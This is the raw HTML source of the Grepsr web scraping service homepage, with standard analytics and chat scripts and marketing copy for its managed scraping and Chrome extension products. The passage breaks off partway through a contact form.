content="@grepsr" /> <meta name="twitter:creator" content="@grepsr" /> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"WebSite","@id":"https://www.grepsr.com/#website","url":"https://www.grepsr.com/","name":"Grepsr","potentialAction":{"@type":"SearchAction","target":"https://www.grepsr.com/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"Organization","url":"https://www.grepsr.com/","sameAs":["https://www.facebook.com/grepsr/","https://www.linkedin.com/company/grepsr","https://www.youtube.com/user/grepsr","https://twitter.com/grepsr"],"@id":"https://www.grepsr.com/#organization","name":"Grepsr Pvt. Ltd.","logo":"https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/uploads/2018/07/logo-blue.png"}</script> <meta name="google-site-verification" content="Y827R-QtV2o4erpe7czAkXIx8DhlYpmXtALK0wFtN9U" /> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//platform-api.sharethis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.grepsr.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.0.3"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-includes/css/dist/block-library/style.min.css?ver=5.0.3' type='text/css' media='all' /> <link rel='stylesheet' id='dashicons-css' href='https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-includes/css/dashicons.min.css?ver=5.0.3' type='text/css' media='all' /> <link rel='stylesheet' id='post-views-counter-frontend-css' href='https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/plugins/post-views-counter/css/frontend.css?ver=1.2.14' type='text/css' media='all' /> <link rel='stylesheet' id='wp-pagenavi-css' href='https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/plugins/wp-pagenavi/pagenavi-css.css?ver=2.70' type='text/css' media='all' /> <link rel='stylesheet' id='slb_core-css' href='https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/plugins/simple-lightbox/client/css/app.css?ver=2.7.1' type='text/css' media='all' /> <link rel='stylesheet' id='dtree.css-css' href='https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/plugins/wp-dtree-30/wp-dtree.min.css?ver=4.4.3.2' type='text/css' media='all' /> <script type='text/javascript' src='https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/plugins/handl-utm-grabber/js/js.cookie.js?ver=5.0.3'></script> <script type='text/javascript'> /* <![CDATA[ */ var handl_utm = []; /* ]]> */ </script> <script type='text/javascript' src='https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/plugins/handl-utm-grabber/js/handl-utm-grabber.js?ver=5.0.3'></script> <script type='text/javascript' src='https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-form-move-tracker.js?ver=1.9.2'></script> <script type='text/javascript' src='//platform-api.sharethis.com/js/sharethis.js#product=ga'></script> <script type='text/javascript'> /* <![CDATA[ */ var WPdTreeSettings = {"animate":"1","duration":"250","imgurl":"https:\/\/www.grepsr.com\/wp-content\/plugins\/wp-dtree-30\/"}; /* ]]> */ </script> <script type='text/javascript' src='https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/plugins/wp-dtree-30/wp-dtree.min.js?ver=4.4.3.2'></script> <link rel='https://api.w.org/' href='https://www.grepsr.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.grepsr.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.0.3" /> <link rel='shortlink' href='https://www.grepsr.com/' /> <link rel="alternate" type="application/json+oembed" href="https://www.grepsr.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.grepsr.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://www.grepsr.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.grepsr.com%2F&#038;format=xml" /> <!-- Google Tag Manager for WordPress by gtm4wp.com --> <script data-cfasync="false" type="text/javascript">//<![CDATA[ dataLayer.push({"pagePostType":"frontpage","pagePostType2":"single-page","pagePostAuthor":"Subrat"});//]]> </script> <script data-cfasync="false">//<![CDATA[ (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= '//www.googletagmanager.com/gtm.'+'js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-W6LHC5R');//]]> </script> <!-- End Google Tag Manager --> <!-- End Google Tag Manager for WordPress by gtm4wp.com --> <style type="text/css" id="wp-custom-css"> .page-template-page-newsletter .thankyou-page .thanks-form label{ font-size: 18px; margin: 20px 0px 10px 0px; } .page-template-page-newsletter .thankyou-page .thanks-form label.title{ font-size: 28px; margin: 5px 0px 15px 0px; } .page-template-page-newsletter .thankyou-page .thanks-form input{ width: 100%; } .page-template-page-newsletter .thankyou-page .thanks-form input[type="submit"]{ margin-top: 20px; } .app_pricing .pricing-header .plans_200 .subplan{ display: none; } .captcha{ padding: 5px 5px 5px 5px; border: solid 1px #CCCCCC; border-radius: 4px; margin-bottom: 10px; display: inline-block; } </style> <!-- start Mixpanel --><script type="text/javascript">(function(e,b){if(!b.__SV){var a,f,i,g;window.mixpanel=b;b._i=[];b.init=function(a,e,d){function f(b,h){var a=h.split(".");2==a.length&&(b=b[a[0]],h=a[1]);b[h]=function(){b.push([h].concat(Array.prototype.slice.call(arguments,0)))}}var c=b;"undefined"!==typeof d?c=b[d]=[]:d="mixpanel";c.people=c.people||[];c.toString=function(b){var a="mixpanel";"mixpanel"!==d&&(a+="."+d);b||(a+=" (stub)");return a};c.people.toString=function(){return c.toString(1)+".people (stub)"};i="disable time_event track track_pageview track_links track_forms register register_once alias unregister identify name_tag set_config people.set people.set_once people.increment people.append people.union people.track_charge people.clear_charges people.delete_user".split(" "); for(g=0;g<i.length;g++)f(c,i[g]);b._i.push([a,e,d])};b.__SV=1.2;a=e.createElement("script");a.type="text/javascript";a.async=!0;a.src="undefined"!==typeof MIXPANEL_CUSTOM_LIB_URL?MIXPANEL_CUSTOM_LIB_URL:"file:"===e.location.protocol&&"//cdn.mxpnl.com/libs/mixpanel-2-latest.min.js".match(/^\/\//)?"https://cdn.mxpnl.com/libs/mixpanel-2-latest.min.js":"//cdn.mxpnl.com/libs/mixpanel-2-latest.min.js";f=e.getElementsByTagName("script")[0];f.parentNode.insertBefore(a,f)}})(document,window.mixpanel||[]); mixpanel.init("e3f64d8611dba42828355d6b96f5fc58", {cross_subdomain_cookie : false});</script><!-- end Mixpanel --> <link rel="chrome-webstore-item" href="https://chrome.google.com/webstore/detail/hjdijkhlfpeafghibmiabeofkiicdnjm"> <!--Start of Zendesk Chat Script--> <script type="text/javascript"> window.$zopim||(function(d,s){var z=$zopim=function(c){z._.push(c)},$=z.s= d.createElement(s),e=d.getElementsByTagName(s)[0];z.set=function(o){z.set. _.push(o)};z._=[];z.set._=[];$.async=!0;$.setAttribute("charset","utf-8"); $.src="https://v2.zopim.com/?laCQwsQBb4NpohsU0P5WKrqQhlvjlzzK";z.t=+new Date;$. type="text/javascript";e.parentNode.insertBefore($,e)})(document,"script"); </script> <!-- moment js --> <script src="https://cdnjs.cloudflare.com/ajax/libs/moment.js/2.23.0/moment.min.js"></script> <!-- moment js end --> <!--End of Zendesk Chat Script--> </head> <body class="home page-template page-template-page-home-new-v2 page-template-page-home-new-v2-php page page-id-2895"> <!-- Google Tag Manager (noscript) --> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-W6LHC5R" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <!-- End Google Tag Manager (noscript) --> <div class="white-logo-navigations hidden-xs" style="display:none;"> <div class="container"> <div class="row navigations"> <div class="header-left col-sm-2"> <a href="https://www.grepsr.com" class="logo"><img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/grepsr-blue.png"></a> </div> <div class="header-right col-sm-7 text-left"> <div class="left-nav"> <nav class="navbar navbar-default"> <!-- Brand and toggle get grouped for better mobile display --> <div class="navbar-header"> <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#fixednav"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> </div> <!-- Collect the nav links, forms, and other content for toggling --> <div id="fixednav" class="collapse navbar-collapse"><ul id="menu-fixed-menu" class="nav navbar-nav navbar-left"><li id="menu-item-2919" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2919"><a title="How It Works" href="https://www.grepsr.com/how-it-works/">How It Works</a></li> <li id="menu-item-3320" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3320"><a title="Services" href="https://www.grepsr.com/services/">Services</a></li> <li id="menu-item-31" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-31"><a title="Customers" href="https://www.grepsr.com/customers/">Customers</a></li> <li id="menu-item-32" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-32"><a title="Pricing" href="https://www.grepsr.com/plans-pricing/">Pricing</a></li> <li id="menu-item-3592" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3592"><a title="Blog" href="https://www.grepsr.com/blog/">Blog</a></li> <li id="menu-item-2888" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2888"><a title="Contact Us" href="https://www.grepsr.com/contact-us/">Contact Us</a></li> </ul></div> <!-- /.navbar-collapse --> </nav> </div> </div> <div class="header-right col-sm-3 text-right"> <div class="right-nav"> <ul class="list-inline" id="first-nav"> <!--<li><a href="https://www.grepsr.com/blog">Blog</a></li>--> <li class="hidden-xs"><a href="https://app.grepsr.com/access/login">Login</a></li> <li><a href="https://app.grepsr.com/signup2">Start a Project</a></li> </ul> </div> </div> </div> </div> </div> <!-- header start --> <div class="home-white-navigations"> <div class="container"> <div class="row navigations"> <div class="header-left col-sm-2"> <a href="https://www.grepsr.com" class="logo"><img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/grepsr-blue.png"></a> </div> <div class="header-right col-sm-3 text-right visible-xs"> <div class="right-nav"> <ul class="list-inline" id="first-nav"> <!--<li><a href="https://www.grepsr.com/blog">Blog</a></li>--> <li class="hidden-xs"><a href="https://app.grepsr.com/access/login">Login</a></li> <li><a href="https://app.grepsr.com/signup2">Start a Project</a></li> </ul> </div> </div> <div class="header-right col-sm-7 text-left"> <div class="left-nav"> <nav class="navbar navbar-default"> <!-- Brand and toggle get grouped for better mobile display --> <div class="navbar-header"> <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#primary"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> </div> <!-- Collect the nav links, forms, and other content for toggling --> <div id="primary" class="collapse navbar-collapse"><ul id="menu-fixed-menu-1" class="nav navbar-nav navbar-left"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2919"><a title="How It Works" href="https://www.grepsr.com/how-it-works/">How It Works</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3320"><a title="Services" href="https://www.grepsr.com/services/">Services</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-31"><a title="Customers" href="https://www.grepsr.com/customers/">Customers</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-32"><a title="Pricing" href="https://www.grepsr.com/plans-pricing/">Pricing</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3592"><a title="Blog" href="https://www.grepsr.com/blog/">Blog</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2888"><a title="Contact Us" href="https://www.grepsr.com/contact-us/">Contact Us</a></li> </ul></div> <!-- /.navbar-collapse --> </nav> </div> </div> <div class="header-right col-sm-3 text-right hidden-xs"> <div class="right-nav"> <ul class="list-inline" id="first-nav"> <!--<li><a href="https://www.grepsr.com/blog">Blog</a></li>--> <li class="hidden-xs"><a href="https://app.grepsr.com/access/login">Login</a></li> <li><a href="https://app.grepsr.com/signup2">Start a Project</a></li> </ul> </div> </div> </div> </div> </div> <section class="main-hero"> <div class="container"> <div class="row"> <div class="col-sm-12"> <div class="hero-content"> <h1 style="font-size: 3rem;">Web Scraping Service Platform That's Effortless</h1> <p><strong>We get it.</strong> You're tired of learning and configuring complicated tools. Plus, it's taking way more time to structure and make data useable.</p> <p>Grepsr managed platform can help with everything you need to capture, normalize and effortlessly bring data into your system.</p> <div class="btns"> <a href="https://app.grepsr.com/signup2" class="btn btn-primary">Get Started Free</a> </div> </div> </div> </div> </div> </section> <div class="brand-logos v9 hidden-xs " id="logos" style=" padding: 30px 0; background-image: linear-gradient(-180deg, #FFFFFF 0%, #f7f7f7 200%); "> <div class="container"> <div class="row brand-lo-wrapper"> <p>Used by thousands of busy professionals at top companies</p> <div class="list-inline"> <ul> <li><img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/logo-target.png"></li> <li><img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/logo-ge.png"></li> <li><img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/logo-groupon.png"></li> <li><img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/logo-seek.png"></li> <li><img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/logo-pearson.png"></li> </ul> </div> </div> </div> </div> <!-- Grepsr use cases --> <div class="services v6" style="padding: 80px 0;"> <div class="container"> <div class="row"> <h2>Fresh and clean data for marketers to investors.</h2> <p>Your data extractors are built by experts, scaled and managed by a powerful crawling platform.</p> <div class="col-sm-4"> <div class="service"> <h2><img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/i1.png"> Lead-Generation Data</h2> <p>Tell us where your ideal customers can be found (e.g. Crunchbase, Yelp) and we will collect the data you need to build targeted prospecting campaigns.</p> </div> </div> <div class="col-sm-4"> <div class="service"> <h2><img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/i2.png"> Pricing &amp; Competitive Data</h2> <p>Get pricing, categories, inventory and other crucial information about your competitors you need to adjust your retail and product strategies.</p> </div> </div> <div class="col-sm-4"> <div class="service"> <h2><img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/i3.png"> Financial &amp; Market Data</h2> <p>We help you to scour financial information, market trends and industry topics to pinpoint the companies you need to know or do business with.</p> </div> </div> </div> <div class="row"> <div class="col-sm-4"> <div class="service"> <h2><img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/i4.png"> Distribution Chain Monitoring</h2> <p>Understand what's selling and what isn't by tracking how your products are placed or promoted on your distributors' or retailers' websites.</p> </div> </div> <div class="col-sm-4"> <div class="service"> <h2><img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/i5.png"> News &amp; Content Aggregation</h2> <p>Create your own news feeds or quickly add new sources to provide unique content by extracting and augmenting data from niche sources.</p> </div> </div> <div class="col-sm-4"> <div class="service"> <h2><img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/i6.png"> Power Your Application</h2> <p>We love working with developers and startups to power their applications and serve as a data backbone. <a href="/contact-us">Contact us!</a></p> </div> </div> </div> </div> </div> <section class="section-why" style="background: #fafafa;"> <div class="container"> <div class="row"> <div class="col-sm-12"> <div class="section-head text-center" style="max-width: 900px;"> <!-- <h4>Web scraping platform</h4> --> <h2 style="font-weight:400; font-size: 32px;">Why choose Grepsr? Because other web scraping solutions are either too expensive or <span style="font-weight:600;">way too complex...</span></h2> <p style="max-width: 900px;">Choose Grepsr when in-house solutions aren't meeting your needs. When scraping tools like Import.io and Mozenda are complicated, or data extraction software like Kofax and Connotate are overkill.</p> </div> </div> <div class="space-50"></div> <div class="col-sm-6 visible-xs"> <img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/app_screen.png" class="img-responsive"> </div> <div class="col-sm-6"> <div class="dash-content"> <h3><img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/tick_ico.png"> Simple Interface</h3> <p>With Grepsr, all you see when you log in is a simple project form to submit your data scraping requirements. You can ditch installing, running and managing complex software tools and keep everyone's focus on what really matters most.</p> </div> <div class="dash-content"> <h3><img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/comment-ico.png"> Built-in Support</h3> <p>No more going through training videos and guides or spending sleepless nights configuring mysterious Xpaths. Feel confident that there's always someone to monitor the health of your extractor, ensuring you complete and steady streams of data.</p> </div> <div class="dash-content"> <h3><img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/addon-ico.png"> Intuitive Features</h3> <p>Enhance your Grepsr web scraping experience with easy-to-use features like the Scheduling Calendar, APIs and Chrome Extension, or choose from our valuable third party integrations to bring data into your system.</p> </div> </div> <div class="col-sm-6 hidden-xs"> <img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/app_screen.png" class="side-img"> </div> </div> </div> </section> <section class="section-product1"> <div class="container"> <div class="row"> <div class="browser-1 col-sm-6"> <div class="browser-screen"></div> </div> <div class="col-sm-6"> <div class="product1-content"> <div class="section-head"> <h4><a href="https://www.grepsr.com/services">GREPSR CONCIERGE</a></h4> <h2>Kick-off scraping projects<br> without any IT burden</h2> </div> <p>Get freedom from IT burden by offloading routine scraping work with <i>Grepsr Concierge</i>: data as a service. From custom crawler setup, data normalization, integration, to timely maintenance - all taken care off by Grepsr experts.</p> <p>Grepsr Concierge is an ideal solution for difficult or large volume scraping tasks. For a streamlined approach to data sourcing and management, Grepsr also integrates with the top business tools you use everyday.</p> <div class="btns"> <a href="https://app.grepsr.com/signup2" class="btn btn-primary">Start a Project</a> <a href="https://www.grepsr.com/services" class="btn btn-secondary">Learn More</a> </div> </div> </div> </div> </div> </section> <section class="section-product2"> <div class="container"> <div class="row"> <div class="col-sm-6"> <div class="section-head"> <h4><a href="https://www.grepsr.com/chrome">GREPSR FOR CHROME</a></h4> <h2>Transform websites into<br> APIs or spreadsheets</h2> </div> <p>Directly from your Chrome browser, point-and-click data element on the website you're viewing, and turn it into APIs or Spreadsheets in minutes. Grepsr for Chrome is a lightweight web scraping tool ideal for personal use or simple scraping jobs.</p> <ul> <li>- Web scrapers up and running in minutes</li> <li>- Schedule recurring scrape with just a calendar</li> <li>- Supports standard pagination, including load more and infinite scroll</li> <li>- Export data in CSV, XLSX, RSS, JSON and more formats</li> <li>- Get data behind a login</li> <li>- APIs for all customization</li> </ul> </div> <div class="col-sm-6 laptop-1 hidden-xs"> <a href="" data-toggle="modal" data-target=".video-chrome" class="laptop-screen"><img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/laptop.png" alt=""></a> </div> </div> </div> </section> <!-- Grepsr features --> <section class="section-home-all-features" style="background: #fafafa;"> <div class="container"> <div class="section-head text-center" style="padding-bottom: 60px;"> <h2 style="font-size: 32px;">An <strong>All-in-one</strong> platform - packed with powerful features</h2> </div> <div class="row"> <div class="col-sm-4"> <div class="feature-item"> <div class="feature-img"> <img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/i8.png" alt=""> </div> <div class="feature-content"> <h3>Easy Setup</h3> <p>Project setup is simple using just a form with full support for our data engineers.</p> </div> </div> </div> <div class="col-sm-4"> <div class="feature-item"> <div class="feature-img"> <img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/i9.png" alt=""> </div> <div class="feature-content"> <h3>Support Inbox</h3> <p>Every project on Grepsr comes with a ‘support’ inbox - your access to Grepsr experts 24/7.</p> </div> </div> </div> <div class="col-sm-4"> <div class="feature-item"> <div class="feature-img"> <img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/i7.png" alt=""> </div> <div class="feature-content"> <h3>Export and Share</h3> <p>Export data in CSV, XLSX, JSON, and more. Share Data or Report with your colleagues.</p> </div> </div> </div> <div class="col-sm-4"> <div class="feature-item"> <div class="feature-img"> <img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/i10.png" alt=""> </div> <div class="feature-content"> <h3>Schedule &amp; Automate</h3> <p>Queue crawls using just a calendar and make routine scraping tasks go live like clockwork.</p> </div> </div> </div> <div class="col-sm-4"> <div class="feature-item"> <div class="feature-img"> <img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/i11.png" alt=""> </div> <div class="feature-content"> <h3>API Ready</h3> <p>Bring data into your app and control what data to get, set and display with powerful APIs.</p> </div> </div> </div> <div class="col-sm-4"> <div class="feature-item"> <div class="feature-img"> <img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/i12.png" alt=""> </div> <div class="feature-content"> <h3>Notifications</h3> <p>Get instantly notified via emails upon crawl completion along with stats and output files.</p> </div> </div> </div> <div class="col-sm-4"> <div class="feature-item"> <div class="feature-img"> <img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/i13.png" alt=""> </div> <div class="feature-content"> <h3>Charts &amp; Visualizations</h3> <p>See crawl activities in pretty charts and take necessary actions.</p> </div> </div> </div> <div class="col-sm-4"> <div class="feature-item"> <div class="feature-img"> <img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/i14.png" alt=""> </div> <div class="feature-content"> <h3>Built-in Proxies</h3> <p>Fast and efficient crawling from multiple IPs without the pain of proxy management.</p> </div> </div> </div> <div class="col-sm-4"> <div class="feature-item"> <div class="feature-img"> <img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/i15.png" alt=""> </div> <div class="feature-content"> <h3>Platform Integrations</h3> <p>Sync data with tools you’re already using like Dropbox, Google Drive, Amazon S3 and more.</p> </div> </div> </div> </div> </div> </section> <section class="section-review"> <div class="container"> <div class="review-content"> <p class="review-name"><strong>Charles Hamilton</strong> - Director of Intl. Client Relations, PearsonVue</p> <p class="review-text">Grepsr allows us to efficiently find and assess the level of our program penetration (which are recognized and which are not) and how they're listed in over 5000 test centres websites. As a result of that, we've turned a loosely based business process into a sustainable one and reduced the overall turnaround time by 5X</p> <p class="review-link"><a href="https://www.grepsr.com/customers/">Read customer stories &xrarr;</a></p> </div> </div> </section> <section class="section-home-features"> <div class="container"> <div class="section-head text-center" style="max-width:940px;"> <h2>The best web scraping service and tools for business teams</h2> <!-- <p>Grepsr is trusted by 1500+ companies to streamline their data ingestion process. With its easy to use interface and managed services, Grepsr helps you through every step of the process.</p> --> </div> <div class="row features-content"> <div class="col-sm-4"> <img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/define.png" alt=""> <h3>Everything you need</h3> <p>Grepsr gives you everything you need for data sourcing, normalization, integration, including useful tools to automate routine scraping work, helping you to get back to your business.</p> </div> <div class="col-sm-4"> <img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/integrations.png" alt="" style="max-height: 230px; margin-bottom: 20px;"> <h3>Third-party integrations</h3> <p>Bring data into your system by using our stripe-like APIs or use our pre-built data connectors that integrates with useful apps like Dropbox, Amazon S3, Box and the good 'ol FTP.</p> </div> <div class="col-sm-4"> <img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/solution.png" alt="" class="last" style="max-height: 250px; margin-bottom: 0;"> <h3>Reliable support</h3> <p>Our support team of engineers is there to help you every step of the way. From crawlers set-up, integrations, to monitoring your data streams so you can have better sleep.</p> </div> </div> </div> </section> <section class="section-clogo hidden-xs"> <div class="container"> <h3>Hundreds of companies use Grepsr as their data backbone, including companies like:</h3> <div class="row text-center"> <div class="col-sm-15"> <img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/logo-c-bain.png" alt=""> </div> <div class="col-sm-15"> <img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/logo-c-groupon.png" alt=""> </div> <div class="col-sm-15"> <img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/logo-c-ubm.png" alt=""> </div> <div class="col-sm-15"> <img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/logo-c-ge.png" alt=""> </div> <div class="col-sm-15"> <img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/logo-c-lazada.png" alt=""> </div> </div> <div class="row text-center logo-second-row"> <div class="col-sm-3"> <img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/logo-c-ola.png" alt=""> </div> <div class="col-sm-3"> <img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/logo-c-pearson.png" alt=""> </div> <div class="col-sm-3"> <img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/logo-c-pb.png" alt=""> </div> <div class="col-sm-3"> <img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/logo-c-rightmove.png" alt=""> </div> </div> </div> </section> <section class="section-cta"> <div class="container text-center"> <h2>Effortless web scraping is just two minutes away!</h2> <a href="https://app.grepsr.com/signup2" class="btn btn-primary">Get Started Free</a> </div> </section> <section class="home-contact"> <div class="container"> <h2>Any questions? Get in touch with us!</h2> <p>We'd love to answer any question you may have regarding our products & services.</p> <div class="wpforms-container wpforms-container-full grepsr-home-contact-form" id="wpforms-3834"><form id="wpforms-form-3834" class="wpforms-validate wpforms-form" data-formid="3834" method="post" enctype="multipart/form-data" action="/"><div class="wpforms-field-container"><div id="wpforms-3834-field_0-container" class="wpforms-field wpforms-field-name wpforms-one-third wpforms-one-third wpforms-first" data-field-id="0"><label class="wpforms-field-label" for="wpforms-3834-field_0">Full Name <span 